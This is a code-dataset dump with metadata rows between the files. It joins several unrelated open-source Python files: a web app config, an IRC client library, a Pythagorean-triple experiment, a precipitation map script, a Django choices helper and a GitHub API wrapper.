return entity.with_user(user['login'], user['password']).create(attrs)
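# Editor's note (illustrative only, not part of the test module): the helper
# above is how every entity in the end-to-end flow is created as the newly
# made user, e.g.
#
#   org = _create(user, Org, {'name': gen_alphanumeric()})
#   domain = _create(user, Domain, {'name': gen_alphanumeric()})
#
# which is shorthand for
# Org.with_user(user['login'], user['password']).create({'name': ...}).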
|
gpl-3.0
| 8,062,769,473,121,014,000
| 32.957895
| 99
| 0.629572
| false
| 3.873912
| true
| false
| false
|
icoz/pysymo
|
config.py
|
1
|
1684
|
# -*- coding: utf-8 -*-
import sys
import os
__author__ = 'ilya-il'
# ==================================================
# PROGRAM CONFIG SECTION. DO NOT EDIT!
# ==================================================
# WTF forms
CSRF_ENABLED = True
SECRET_KEY = 'sifdjncs-dcqodicnpdscn[osncpas#vaidcjnsajcacbqisbccsbab-cdsacvalsdcb!alsjdbafdba'
# priority list
# WARNING! do not change item position in list
# and do not change list type 'list' :)
MSG_PRIORITY_LIST = ['emerg', 'alert', 'crit', 'err', 'warn', 'notice', 'info', 'debug']
# datetime format for search form
DATETIME_FORMAT = '%d.%m.%Y %H:%M:%S'
# pysymo version
PYSYMO_VERSION = 0.2
# log file
if sys.platform == 'win32':
basedir = os.path.abspath(os.path.dirname(__file__))
PYSYMO_LOG = os.path.join(basedir, 'python.log')
else:
PYSYMO_LOG = os.environ.get('PYSYMO_LOG') or '/var/log/pysymo/python.log'
# L10n
LANGUAGES = {
'en': 'English',
'ru': 'Russian'
}
# ==================================================
# USER EDITABLE SECTION
# ==================================================
# watch mode interval in seconds
WATCH_MODE_REFRESH_INTERVAL = 30
# allow registration (only for plain auth)
REGISTRATION_ENABLED = True
# Auth type - plain, ldap
AUTH_TYPE = 'plain'
# LDAP
LDAP_SERVER = os.environ.get('PYSYMO_LDAP_SERVER') or 'ldap://[ldap_server]'
LDAP_SEARCH_BASE = os.environ.get('PYSYMO_LDAP_BASE') or '[organisation]'
LDAP_SERVICE_USER = os.environ.get('PYSYMO_LDAP_USER') or '[service_user_dn]'
LDAP_SERVICE_PASSWORD = os.environ.get('PYSYMO_LDAP_PASSWORD') or '[password]'
# MEDB - message explanation database
MEDB_ENABLED = True
# Use fully qualified domain names
USE_FQDN = True
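# Editor's sketch (illustrative, not part of the original config): because
# the LDAP settings above read os.environ first, a deployment can override
# them without editing this file; the hostname and DNs are placeholder
# assumptions.
#
#   import os
#   os.environ.setdefault('PYSYMO_LDAP_SERVER', 'ldap://ldap.example.com')
#   os.environ.setdefault('PYSYMO_LDAP_BASE', 'dc=example,dc=com')
#   import config  # picks up the overrides at import time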
|
gpl-2.0
| 3,612,526,265,983,320,600
| 25.730159
| 95
| 0.595606
| false
| 3.118519
| false
| false
| false
|
MrJohz/K-Eight
|
ircutils/client.py
|
1
|
13416
|
""" This module provides a direct client interface for managing an IRC
connection. If you are trying to build a bot, :class:`ircutils.bot.SimpleBot`
inherits from :class:`SimpleClient` so it has the methods listed below.
"""
from __future__ import absolute_import
import collections
import pprint
from . import connection
from . import ctcp
from . import events
from . import format
from . import protocol
class SimpleClient(object):
""" SimpleClient is designed to provide a high level of abstraction
of the IRC protocol. Its methods are structured in a way that allows
you to often bypass the need to send raw IRC commands. By default,
``auto_handle`` is set to ``True`` and allows the client to handle the
following:
* Client nickname changes
* Client channel tracking
* CTCP version requests
"""
software = "http://dev.guardedcode.com/projects/ircutils/"
version = (0,1,3)
custom_listeners = {}
def __init__(self, nick, real_name="A Python IRC Bot by Johz", mode="+B", auto_handle=True):
self.nickname = nick
self.user = nick
self.real_name = real_name
self.filter_formatting = True
self.channels = collections.defaultdict(protocol.Channel)
self.events = events.EventDispatcher()
self._prev_nickname = None
self._mode = mode
self._register_default_listeners()
if auto_handle:
self._add_built_in_handlers()
def __getitem__(self, name):
return self.events[name]
def __setitem__(self, name, value):
self.register_listener(name, value)
def _register_default_listeners(self):
""" Registers the default listeners to the names listed in events. """
# Connection events
for name in events.connection:
self.events.register_listener(name, events.connection[name]())
# Standard events
for name in events.standard:
self.events.register_listener(name, events.standard[name]())
# Message events
for name in events.messages:
self.events.register_listener(name, events.messages[name]())
# CTCP events
for name in events.ctcp:
self.events.register_listener(name, events.ctcp[name]())
# RPL_ events
for name in events.replies:
self.events.register_listener(name, events.replies[name]())
# Custom listeners
for name in self.custom_listeners:
self.events.register_listener(name, self.custom_listeners[name])
def _add_built_in_handlers(self):
""" Adds basic client handlers.
These handlers are bound to events that affect the data that the
client handles. It is required to have these in order to keep
track of things like client nick changes, joined channels,
and channel user lists.
"""
self.events["any"].add_handler(_update_client_info)
self.events["name_reply"].add_handler(_set_channel_names)
self.events["ctcp_version"].add_handler(_reply_to_ctcp_version)
self.events["part"].add_handler(_remove_channel_user_on_part)
self.events["quit"].add_handler(_remove_channel_user_on_quit)
self.events["join"].add_handler(_add_channel_user)
def _dispatch_event(self, prefix, command, params):
""" Given the parameters, dispatch an event.
After first building an event, this method sends the event(s) to the
primary event dispatcher.
This replaces :func:`connection.Connection.handle_line`
"""
try:
self._pending_events
except AttributeError:
self._pending_events = []
# TODO: Event parsing doesn't belong here.
if command in ["PRIVMSG", "NOTICE"]:
event = events.MessageEvent(prefix, command, params)
message_data = event.params[-1]
message_data = ctcp.low_level_dequote(message_data)
message_data, ctcp_requests = ctcp.extract(event.params[-1])
if self.filter_formatting:
message_data = format.filter(message_data)
if message_data.strip() != "":
event.message = message_data
self._pending_events.append(event)
for command, params in ctcp_requests:
ctcp_event = events.CTCPEvent()
ctcp_event.command = "CTCP_%s" % command
ctcp_event.params = params
ctcp_event.source = event.source
ctcp_event.target = event.target
self._pending_events.append(ctcp_event)
else:
self._pending_events.append(events.StandardEvent(prefix, command, params))
while self._pending_events:
event = self._pending_events.pop(0)
self.events.dispatch(self, event)
def connect(self, host, port=None, channel=None, use_ssl=False,
password=None):
""" Connect to an IRC server. """
self.conn = connection.Connection()
self.conn.handle_line = self._dispatch_event
self.conn.connect(host, port, use_ssl, password)
self.conn.execute("USER", self.user, self._mode, "*",
trailing=self.real_name)
self.conn.execute("NICK", self.nickname)
self.conn.handle_connect = self._handle_connect
self.conn.handle_close = self._handle_disconnect
if channel is not None:
# Builds a handler on-the-fly for joining init channels
if isinstance(channel, basestring):
channels = [channel]
else:
channels = channel
def _auto_joiner(client, event):
for channel in channels:
client.join_channel(channel)
self.events["welcome"].add_handler(_auto_joiner)
def is_connected(self):
return self.conn.connected
def _handle_connect(self):
connection.Connection.handle_connect(self.conn)
event = events.ConnectionEvent("CONN_CONNECT")
self.events.dispatch(self, event)
def _handle_disconnect(self):
connection.Connection.handle_close(self.conn)
event = events.ConnectionEvent("CONN_DISCONNECT")
self.events.dispatch(self, event)
def register_listener(self, event_name, listener):
""" Registers an event listener for a given event name.
In essence, this binds the event name to the listener and simply
provides an easier way to reference the listener.
::
client.register_listener("event_name", MyListener())
"""
self.events.register_listener(event_name, listener)
def identify(self, ns_password):
""" Identify yourself with the NickServ service on IRC.
This assumes that NickServ is present on the server.
"""
self.send_message("NickServ", "IDENTIFY {0}".format(ns_password))
def join_channel(self, channel, key=None):
""" Join the specified channel. Optionally, provide a key to the channel
if it requires one.
::
client.join_channel("#channel_name")
client.join_channel("#channel_name", "channelkeyhere")
"""
if channel == "0":
self.channels = []
self.execute("JOIN", "0")
else:
if key is not None:
params = [channel, key]
else:
params = [channel]
self.execute("JOIN", *params)
def part_channel(self, channel, message=None):
""" Leave the specified channel.
You may provide a message that shows up during departure.
"""
self.execute("PART", channel, trailing=message)
def send_message(self, target, message, to_service=False):
""" Sends a message to the specified target.
If it is a service, it uses SQUERY instead.
"""
message = ctcp.low_level_quote(message)
if to_service:
self.execute("SQUERY", target, message)
else:
self.execute("PRIVMSG", target, trailing=message)
def send_notice(self, target, message):
""" Sends a NOTICE to the specified target.
"""
message = ctcp.low_level_quote(message)
self.execute("NOTICE", target, trailing=message)
def send_ctcp(self, target, command, params=None):
""" Sends a CTCP (Client-to-Client-Protocol) message to the target.
"""
if params is not None:
params.insert(0, command)
self.send_message(target, ctcp.tag(" ".join(params)))
else:
self.send_message(target, ctcp.tag(command))
def send_ctcp_reply(self, target, command, params=None):
""" Sends a CTCP reply message to the target.
This differs from send_ctcp() because it uses NOTICE instead, as
specified by the CTCP documentation.
"""
if params is not None:
params.insert(0, command)
self.send_notice(target, ctcp.tag(" ".join(params)))
else:
self.send_notice(target, ctcp.tag(command))
def send_action(self, target, action_message):
""" Perform an "action". This is the same as when a person uses the
``/me is jumping up and down!`` command in their IRC client.
"""
self.send_ctcp(target, "ACTION", [action_message])
def set_nickname(self, nickname):
""" Attempts to set the nickname for the client. """
self._prev_nickname = self.nickname
self.execute("NICK", nickname)
def disconnect(self, message=None):
""" Disconnects from the IRC server.
If `message` is set, it is provided as a departing message.
Example::
client.disconnect("Goodbye cruel world!")
"""
self.execute("QUIT", trailing=message)
self.channels = []
self.conn.close_when_done()
def start(self):
""" Begin the client.
If you wish to run multiple clients at the same time, be sure to
use ``ircutils.start_all()`` instead.
"""
self.conn.start()
def execute(self, command, *args, **kwargs):
""" Execute an IRC command on the server.
Example::
self.execute("PRIVMSG", channel, trailing="Hello, world!")
"""
command, params = self.conn.execute(command, *args, **kwargs)
# Some less verbose aliases
join = join_channel
part = part_channel
notice = send_notice
action = send_action
quit = disconnect
# TODO: UPDATE EVERYTHING HERE.
def _reply_to_ctcp_version(client, event):
version_info = "IRCUtils:%s:Python" % ".".join(map(str, client.version))
client.send_ctcp_reply(event.source, "VERSION", [version_info])
def _update_client_info(client, event):
command = event.command
params = event.params
if command == "RPL_WELCOME":
if client.nickname != event.target:
client.nickname = event.target
if command == "ERR_ERRONEUSNICKNAME":
client.set_nickname(protocol.filter_nick(client.nickname))
elif command == "ERR_NICKNAMEINUSE":
client.set_nickname(client.nickname + "_")
elif command == "ERR_UNAVAILRESOURCE":
if not protocol.is_channel(event.params[0]):
client.nickname = client._prev_nickname
elif command == "NICK" and event.source == client.nickname:
client.nickname = event.target
if command in ["ERR_INVITEONLYCHAN", "ERR_CHANNELISFULL", "ERR_BANNEDFROMCHAN",
"ERR_BADCHANNELKEY", "ERR_TOOMANYCHANNELS", "ERR_NOSUCHCHANNEL"
"ERR_BADCHANMASK"]:
channel_name = params[0].lower()
if channel_name in client.channels:
del client.channels[channel_name]
elif command == "ERR_UNAVAILRESOURCE":
channel_name = params[0].lower()
if protocol.is_channel(channel_name) and channel_name in client.channels:
del client.channels[channel_name]
def _set_channel_names(client, name_event):
channel_name = name_event.channel.lower()
client.channels[channel_name].name = channel_name
client.channels[channel_name].user_list = name_event.name_list
def _remove_channel_user_on_part(client, event):
channel = event.target.lower()
if event.source == client.nickname:
del client.channels[channel]
elif event.source in client.channels[channel].user_list:
client.channels[channel].user_list.remove(event.source)
def _remove_channel_user_on_quit(client, event):
# TODO: This solution is slow. There might be a better one.
for channel in client.channels:
if event.source in client.channels[channel].user_list:
client.channels[channel].user_list.remove(event.source)
def _add_channel_user(client, event):
channel = event.target.lower()
client.channels[channel].user_list.append(event.source)
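# --- Editor's usage sketch (not part of ircutils): a minimal bot built on
# SimpleClient. The "welcome" event name is taken from the handlers above;
# the server, channel and the "channel_message" event name are assumptions.
#
#   from ircutils import client
#
#   bot = client.SimpleClient(nick="demo_bot")
#
#   def on_welcome(cli, event):
#       cli.join_channel("#demo")
#
#   def on_channel_message(cli, event):
#       cli.send_message(event.target, event.message)  # naive echo
#
#   bot["welcome"].add_handler(on_welcome)
#   bot["channel_message"].add_handler(on_channel_message)
#   bot.connect("irc.example.org", port=6667)
#   bot.start()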
|
bsd-2-clause
| 5,246,288,881,876,310,000
| 34.401055
| 96
| 0.599583
| false
| 4.204325
| false
| false
| false
|
akrherz/iem
|
scripts/climodat/precip_days.py
|
1
|
1747
|
"""
Generate a map of Number of days with precip
"""
import sys
import datetime
from pyiem.plot import MapPlot
from pyiem.network import Table as NetworkTable
from pyiem.util import get_dbconn
import psycopg2.extras
def runYear(year):
"""Do as I say"""
# Grab the data
now = datetime.datetime.now()
nt = NetworkTable("IACLIMATE")
nt.sts["IA0200"]["lon"] = -93.4
nt.sts["IA5992"]["lat"] = 41.65
pgconn = get_dbconn("coop", user="nobody")
ccursor = pgconn.cursor(cursor_factory=psycopg2.extras.DictCursor)
lats = []
lons = []
vals = []
labels = []
ccursor.execute(
"""
SELECT station,
sum(case when precip > 0.009 then 1 else 0 end) as days, max(day)
from alldata_ia WHERE year = %s and substr(station,3,1) != 'C'
and station != 'IA0000' GROUP by station
""",
(year,),
)
for row in ccursor:
sid = row["station"].upper()
if sid not in nt.sts:
continue
labels.append(sid[2:])
lats.append(nt.sts[sid]["lat"])
lons.append(nt.sts[sid]["lon"])
vals.append(row["days"])
maxday = row["max"]
mp = MapPlot(
title="Days with Measurable Precipitation (%s)" % (year,),
subtitle="Map valid January 1 - %s" % (maxday.strftime("%b %d")),
axisbg="white",
)
mp.plot_values(
lons,
lats,
vals,
fmt="%.0f",
labels=labels,
labeltextsize=8,
labelcolor="tan",
)
mp.drawcounties()
pqstr = "plot m %s bogus %s/summary/precip_days.png png" % (
now.strftime("%Y%m%d%H%M"),
year,
)
mp.postprocess(pqstr=pqstr)
if __name__ == "__main__":
runYear(sys.argv[1])
|
mit
| 4,895,807,264,595,162,000
| 24.318841
| 73
| 0.557527
| false
| 3.283835
| false
| false
| false
|
SurfasJones/icecream-info
|
icecream/lib/python2.7/site-packages/model_utils/choices.py
|
1
|
4990
|
from __future__ import unicode_literals
class Choices(object):
"""
A class to encapsulate handy functionality for lists of choices
for a Django model field.
Each argument to ``Choices`` is a choice, represented as either a
string, a two-tuple, or a three-tuple.
If a single string is provided, that string is used as the
database representation of the choice as well as the
human-readable presentation.
If a two-tuple is provided, the first item is used as the database
representation and the second the human-readable presentation.
If a triple is provided, the first item is the database
representation, the second a valid Python identifier that can be
used as a readable label in code, and the third the human-readable
presentation. This is most useful when the database representation
must sacrifice readability for some reason: to achieve a specific
ordering, to use an integer rather than a character field, etc.
Regardless of what representation of each choice is originally
given, when iterated over or indexed into, a ``Choices`` object
behaves as the standard Django choices list of two-tuples.
If the triple form is used, the Python identifier names can be
accessed as attributes on the ``Choices`` object, returning the
database representation. (If the single or two-tuple forms are
used and the database representation happens to be a valid Python
identifier, the database representation itself is available as an
attribute on the ``Choices`` object, returning itself.)
Option groups can also be used with ``Choices``; in that case each
argument is a tuple consisting of the option group name and a list
of options, where each option in the list is either a string, a
two-tuple, or a triple as outlined above.
"""
def __init__(self, *choices):
# list of choices expanded to triples - can include optgroups
self._triples = []
# list of choices as (db, human-readable) - can include optgroups
self._doubles = []
# dictionary mapping Python identifier to db representation
self._mapping = {}
# set of db representations
self._db_values = set()
self._process(choices)
def _store(self, triple, triple_collector, double_collector):
self._mapping[triple[1]] = triple[0]
self._db_values.add(triple[0])
triple_collector.append(triple)
double_collector.append((triple[0], triple[2]))
def _process(self, choices, triple_collector=None, double_collector=None):
if triple_collector is None:
triple_collector = self._triples
if double_collector is None:
double_collector = self._doubles
store = lambda c: self._store(c, triple_collector, double_collector)
for choice in choices:
if isinstance(choice, (list, tuple)):
if len(choice) == 3:
store(choice)
elif len(choice) == 2:
if isinstance(choice[1], (list, tuple)):
# option group
group_name = choice[0]
subchoices = choice[1]
tc = []
triple_collector.append((group_name, tc))
dc = []
double_collector.append((group_name, dc))
self._process(subchoices, tc, dc)
else:
store((choice[0], choice[0], choice[1]))
else:
raise ValueError(
"Choices can't take a list of length %s, only 2 or 3"
% len(choice)
)
else:
store((choice, choice, choice))
def __len__(self):
return len(self._doubles)
def __iter__(self):
return iter(self._doubles)
def __getattr__(self, attname):
try:
return self._mapping[attname]
except KeyError:
raise AttributeError(attname)
def __getitem__(self, index):
return self._doubles[index]
def __add__(self, other):
if isinstance(other, self.__class__):
other = other._triples
else:
other = list(other)
return Choices(*(self._triples + other))
def __radd__(self, other):
# radd is never called for matching types, so we don't check here
other = list(other)
return Choices(*(other + self._triples))
def __eq__(self, other):
if isinstance(other, self.__class__):
return self._triples == other._triples
return False
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
', '.join(("%s" % repr(i) for i in self._triples))
)
def __contains__(self, item):
return item in self._db_values
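# --- Editor's usage sketch (not part of model-utils): exercises the three
# argument forms described in the class docstring above.
if __name__ == "__main__":
    STATUS = Choices(
        "new",                            # plain string
        ("in_progress", "In progress"),   # (db value, display)
        (0, "DRAFT", "is a draft"),       # (db value, identifier, display)
    )
    assert STATUS.new == "new"
    assert STATUS.in_progress == "in_progress"
    assert STATUS.DRAFT == 0
    # Iteration yields the standard Django (db value, display) two-tuples.
    assert list(STATUS) == [("new", "new"),
                            ("in_progress", "In progress"),
                            (0, "is a draft")]
    assert "new" in STATUS and 0 in STATUS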
|
mit
| -3,453,485,655,542,937,000
| 33.652778
| 78
| 0.591383
| false
| 4.628942
| false
| false
| false
|
donbright/piliko
|
experiment/experiment2.py
|
1
|
3122
|
from fractions import Fraction
import sys
# this program explores patterns of pythagorean triples
# in the stern brocot tree... or more specifically,
# the stern diatomic sequence, aka the 'denominators' of the
# stern brocot sequence, aka the farey sequence denominators
# aka 2*sqrt(radius) of the ford circles
# it looks for 'adjacent' triple numbers, such as 3,4,5 which all 'touch'
# if you draw the stern diatomic sequence as a tree.
#
# 5,12,13 touch, so do others.
#
def pyth():
for i in range(1,100):
for j in range(1,100):
for k in range(1,100):
if i*i+j*j==k*k: print i,j,k
print
def checkp(x,y,z):
if x*x+y*y==z*z: return True
if z*z+y*y==x*x: return True
if x*x+z*z==y*y: return True
def newlayer(l1):
l2=[]
for i in range(len(l1)-1):
#newnumerator = l1[i].numerator + l1[i+1].numerator
#newdenominator = l1[i].denominator + l1[i+1].denominator
#l2+=[Fraction(newnumerator,newdenominator)]
l2 += [l1[i]+l1[i+1]]
return l2
def mixlayer(l1,l2):
l3=[]
for i in range(0,len(l1)-1):
l3+=[l1[i],l2[i]]
l3 += [l1[len(l1)-1]]
return l3
def checkpl(ml):
r=[]
for i in range(0,len(ml)-2):
x=ml[i]
y=ml[i+1]
z=ml[i+2]
if checkp(x,y,z): r+=[[x,y,z]]
return r
def checkpr(nlist):
primes=[]
for n in nlist:
prime=True
for i in range(2,n):
if n % i == 0: prime=False
if prime: primes += [n]
return primes
def dopyth1():
for m in range(0,20):
for n in range(0,20):
a=m*m-n*n # note - this is red quadrance
b=2*m*n # note - this is green quadrance
c=m*m+n*n # note - this is blue quadrance
print a,b,c,checkpl([a,b,c])
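# editor's worked example (not in the original): with the parametrisation
# above, m=2, n=1 gives a = 4-1 = 3, b = 2*2*1 = 4, c = 4+1 = 5, i.e. the
# (3,4,5) triple; m=3, n=2 gives (5,12,13).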
def dopyth2():
for m in range(1,110):
for n in range(1,110):
for k in range(1,110):
print m,n,k,checkpl([m,n,k]),checkpr([m,n,k])
import math
def dopyth3():
for m in range(1,110000):
msq = m*m+(m-2)*(m-2)
if checkp(m,m-2,math.trunc(math.sqrt(msq))): print m,m-2,math.sqrt(msq)
dopyth3()
sys.exit()
# pattern 1.. legs 1 apart?
# adjacent in stern diatomic network
# one per odd row
# in stern numerator, accumulate in every row!
# 3 4 5
# 5 12 13
# 7 24 25
# 9 40 41
# 11 60 61
# 13 , ,
# depth in tree = directly related to first #, formula for 2nd two order(n^2)
# pattern 2..??? legs 2 apart
#-1,0,1
#4,3,5
#8,15,17
#12,35,37
#16,63,65
#20,99,101
#24,143,145
#28,195,197
# again, order n^2 (2n,n^2+/-1, n=0,2,4,8,10,12,..). row = ?
# pattern 3
# legs will be 3 apart? (sqrt blue quadrance - sqrt green q = 3 )????
# or... pattern 3, legs will be 9 apart?
# 5, -4, 3
# 9, 0, 9
# 17 8 15 (also 2 apart)
# 29 20 21
# 45 36 27 (also 3,4,5)
# or..... 7 apart?
# 12 5 13
# 15 8 17
# 28 21 35 (aleo 4 , 3, 5 )
# . . .
# note that pythagorean triples with a prime leg do something weird.
#dopyth2()
#sys.exit()
#l1=[0,0] # zero
#l1=[0,1] # numerator
l1=[1,1] # denominator (stern diatomic)
prlen=1000
for j in range(0,21):
print l1[0:prlen],'...',len(l1)
nl = newlayer(l1)
ml = mixlayer(l1, nl)
l1 = ml
print nl[0:prlen], '...',len(nl)
print ml[0:prlen], '...',len(ml)
ptl = checkpl(ml)
print "pth:", ptl
#for sublist in ptl:
# print "prm:", checkpr(sublist)
print
|
bsd-3-clause
| 7,146,669,838,024,524,000
| 20.531034
| 77
| 0.614029
| false
| 2.226819
| false
| false
| false
|
Jucyio/Jucy
|
web/github_mixins.py
|
1
|
13786
|
import json
import urlparse
kwargs_issues_filters = {
'duplicates': { 'state': 'closed', 'label': 'duplicate' },
'rejected': { 'state': 'closed', 'label': 'rejected' },
'done': { 'state': 'closed', 'label': '-rejected,duplicate' },
'ready': { 'state': 'open', 'label': 'ready' },
'new': { 'state': 'open', 'label': '-ready' },
}
class GithubException(Exception):
def __init__(self, status_code, data):
self.data = data
self.status = status_code
def __str__(self):
return json.dumps(self.data)
class GithubMixin(object):
def _wrap_error(self, expected_status, status_code, data):
""" Wraps Github API errors
Args:
expected_status (int): HTTP status code expected for the reply
data (dict): The data returned by the request
Raises a GithubException if status_code differs from expected_status.
"""
if status_code != expected_status:
raise GithubException(status_code, data)
return data
def get_repos(self, *args, **kwargs):
""" Return all repositories available to the user
Github Reference:
path: /user/repos/
method: GET
reference: https://developer.github.com/v3/repos/#list-your-repositories
Args:
*args and **kwargs are passed as GET parameter to the request constructor
see available parameters in the Github API reference
"""
status_code, data = self.gh.user.repos.get(*args, **kwargs)
return self._wrap_error(200, status_code, data)
def get_paginated_repos(self, pagesize=200):
data = self.get_repos(per_page=pagesize)
headers = dict(self.gh.getheaders())
last_page = None
if 'link' in headers:
links = headers['link'].split(',')
for link in links:
content = link.strip().split('; ')
if content[1].strip() == 'rel="last"':
addr = content[0][1:-1]
query = urlparse.parse_qs(urlparse.urlparse(addr).query)
last_page = query['page'][0]
if last_page is not None:
for page in range(2, int(last_page) + 1):
print page
data = data + self.get_repos(per_page=pagesize, page=page)
return data
def get_user_repos(self, username):
""" Return all repositories available to the specified user
Github Reference:
path: /users/:username/repos
method: GET
reference: https://developer.github.com/v3/repos/#list-user-repositories
Args:
username (str) : Github username
"""
status_code, data = self.gh.users[username].repos.get()
return self._wrap_error(200, status_code, data)
def repo(self, username, repo):
""" Return a repository
Github Reference:
path: /repos/:owner/:repo
method: GET
reference: https://developer.github.com/v3/repos/#get
Args:
username (str) : Github username
repo (str) : Github repository name
"""
status_code, data = self.gh.repos[username][repo].get()
return self._wrap_error(200, status_code, data)
def is_collaborator_on_repo(self, owner, repo, username):
""" Return True is the user is collaborator for the specified repository, else False.
Github Reference:
path: /repos/:owner/:repo/collaborators/:username
method: GET
reference: https://developer.github.com/v3/repos/collaborators/#check-if-a-user-is-a-collaborator
Args:
owner (str) : Github username
repo (str) : Github repository name
"""
status_code, data = self.gh.repos[owner][repo].collaborators[username].get()
if status_code == 404:
return False
elif status_code == 204:
return True
else:
raise GithubException(status_code, data)
def search_issues(self, *args, **kwargs):
""" Do an issue search
Github Reference:
path: /search/issues
method: GET
reference: https://developer.github.com/v3/search/#search-issues
Args:
**kwargs are passed as search pattern according to the q syntax specified in the API reference.
For example, search_issues(state='open', label='bug') will search with q=state:open label:bug.
Negation for a pattern can be obtained by prefixing a value with '-':
Example: search_issues(label='-bug') will search with q=-label:bug
"""
q = ''
for key, value in kwargs.iteritems():
remove = value.startswith('-')
if remove:
value = value[1:]
if ',' in value:
values = value.split(',')
else:
values = [value]
for value in values:
q += ' ' + ('-' if remove else '') + '{}:{}'.format(key, value)
print q
status_code, data = self.gh.search.issues.get(q=q)
return self._wrap_error(200, status_code, data)
def get_issues(self, full_repository_name, issues_to_get=['ready'], context=None):
""" Return issues for the given repository.
Args:
full_repository_name (str) : Github repository full name
issues_to_get (array of str) : Type of issues to get (see list below)
context (dict) : A dictionary that will be updated with the issues retrieved
It will split the result into a dictionary, according to the following principles:
- If an issue is closed, and the duplicate label is set: 'duplicate'
- If an issue is closed, and the rejected label is set: 'rejected'
- If an issue is closed without the aforementioned labels: 'done'
- If an issue is open, with a ready label set: 'ready'
- If an issue is open without the ready label: 'new'
If a context object is given, it will populate it, else it will return a dictionary
"""
if not context:
context = {}
context['issues'] = []
for issue_type in issues_to_get:
try:
issues = self.search_issues(repo=full_repository_name, **kwargs_issues_filters[issue_type])
except KeyError:
continue
for issue in issues['items']:
issue['type'] = issue_type
context[issue_type] = issues
context['issues'] += issues['items']
return context
def get_comments(self, owner, repository, issue):
""" Return comments for a given issue
Github Reference:
path: /repos/:owner/:repo/issues/:number/comments
method: GET
reference: https://developer.github.com/v3/issues/comments/#list-comments-on-an-issue
Args:
owner (str) : Github username
repository (str) : Github repository
issue (int) : Issue id
"""
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].comments.get()
return self._wrap_error(200, status_code, data)
def add_comment(self, owner, repository, issue, body):
""" Create a comment in the given issue
Github Reference:
path: /repos/:owner/:repo/issues/:number/comments
method: POST
reference: https://developer.github.com/v3/issues/comments/#create-a-comment
Args:
owner (str) : Github username
repository (str) : Github repository
issue (int) : Issue id
body (str) : Comment content
"""
payload = {'body': body}
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].comments.post(body=payload)
return self._wrap_error(201, status_code, data)
def create_hook(self, owner, repository, name, config, events):
""" Create a hook for the given repository
Github Reference:
path: /repos/:owner/:repo/hooks
method: POST
reference: https://developer.github.com/v3/repos/hooks/#create-a-hook
Args:
owner (str) : Github username
repository (str) : Github repository
name (str) : Webhook name
config (dict) : config object as specified in the Github API reference
events (list) : events to register to as specified in the Github API reference
"""
payload = {'config': config, 'events': events, 'name': name}
status_code, data = self.gh.repos[owner][repository].hooks.post(body=payload)
return self._wrap_error(201, status_code, data)
def create_label(self, owner, repository, name, color):
""" Create a new label
Github Reference:
path: /repos/:owner/:repo/labels
method: POST
reference: https://developer.github.com/v3/issues/labels/#create-a-label
Args:
owner (str) : Github username
repository (str) : Github repository
name (str) : Label name
color (str) : Label color
"""
payload = {'name': name, 'color': color}
status_code, data = self.gh.repos[owner][repository].labels.post(body=payload)
return self._wrap_error(201, status_code, data)
def create_issue(self, owner, repository, title, content, labels):
""" Create an issue
Github Reference:
path: /repos/:owner/:repo/issues
method: POST
reference: https://developer.github.com/v3/issues/#create-an-issue
Args:
owner (str) : Github username
repository (str) : Github repository
title (str) : Issue title
content (str) : Issue body
labels (list) : Issue labels
"""
payload = {'title': title, 'body': content, 'labels': labels}
status_code, data = self.gh.repos[owner][repository].issues.post(body=payload)
return self._wrap_error(201, status_code, data)
def remove_label(self, owner, repository, issue, label):
""" Remove a label from an issue
Github Reference:
path: /repos/:owner/:repo/issues/:number/labels/:name
method: DELETE
reference: https://developer.github.com/v3/issues/labels/#remove-a-label-from-an-issue
Args:
owner (str) : Github username
repository (str) : Github repository
issue (int) : Issue id
label (str) : Label
"""
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].labels[label].delete()
return self._wrap_error(200, status_code, data)
def replace_labels(self, owner, repository, issue, labels):
""" Replace labels from an issue
Github Reference:
path: /repos/:owner/:repo/issues/:number/labels
method: PUT
reference: https://developer.github.com/v3/issues/labels/#replace-all-labels-for-an-issue
Args:
owner (str) : Github username
repository (str) : Github repository
issue (int) : Issue id
labels (str list) : Labels
"""
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].labels.put(body=labels)
return self._wrap_error(200, status_code, data)
def get_issue(self, owner, repository, issue):
""" get a single issue
github reference:
path: /repos/:owner/:repo/issues/:number
method: GET
reference: https://developer.github.com/v3/issues/#get-a-single-issue
args:
owner (str) : github username
repository (str) : github repository
issue (int) : issue number
"""
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].get()
return self._wrap_error(200, status_code, data)
def add_labels(self, owner, repository, issue, labels):
""" Add labels to an issue
Github Reference:
path: /repos/:owner/:repo/issues/:number/labels
method: POST
reference: https://developer.github.com/v3/issues/labels/#add-labels-to-an-issue
Args:
owner (str) : Github username
repository (str) : Github repository
issue (int) : Issue id
labels (str list) : Labels
"""
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].labels.post(body=labels)
return self._wrap_error(200, status_code, data)
def add_as_collaborator_on_repo(self, owner, repository, username):
status_code, data = self.gh.repos[owner][repository].collaborators[username].put()
try:
return self._wrap_error(204, status_code, data)
except GithubException, exn:
pass
def edit_issue(self, owner, repository, issue, payload):
""" Edit an issue
Github Reference:
path: /repos/:owner/:repo/issues/:number
method: PATCH
reference: https://developer.github.com/v3/issues/#edit-an-issue
Args:
owner (str) : Github username
repository (str) : Github repository
issue (int) : Issue id
payload (dict) : A dict containing the payload according to the API documentation
"""
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].patch(body=payload)
return self._wrap_error(200, status_code, data)
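# --- Editor's usage sketch (not part of the original mixin): how the
# q-string documented in search_issues() is assembled. GithubClient and its
# `gh` attribute (an agithub-style client) are assumptions for illustration.
#
#   class GithubClient(GithubMixin):
#       def __init__(self, gh):
#           self.gh = gh
#
#   client = GithubClient(gh)
#   # builds q = "repo:owner/repo state:open label:ready"
#   ready = client.search_issues(repo='owner/repo', state='open', label='ready')
#   # '-' negates and ',' fans out over several labels:
#   # builds q = "repo:owner/repo state:closed -label:rejected -label:duplicate"
#   done = client.search_issues(repo='owner/repo', state='closed',
#                               label='-rejected,duplicate')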
|
apache-2.0
| -6,902,052,481,229,804,000
| 35.762667
| 109
| 0.58204
| false
| 4.203049
| false
| false
| false
|
cikelengfeng/HTTPIDL
|
Sources/Compiler/antlr4/tree/RuleTagToken.py
|
2
|
1972
|
#
# Copyright (c) 2012-2017 The ANTLR Project. All rights reserved.
# Use of this file is governed by the BSD 3-clause license that
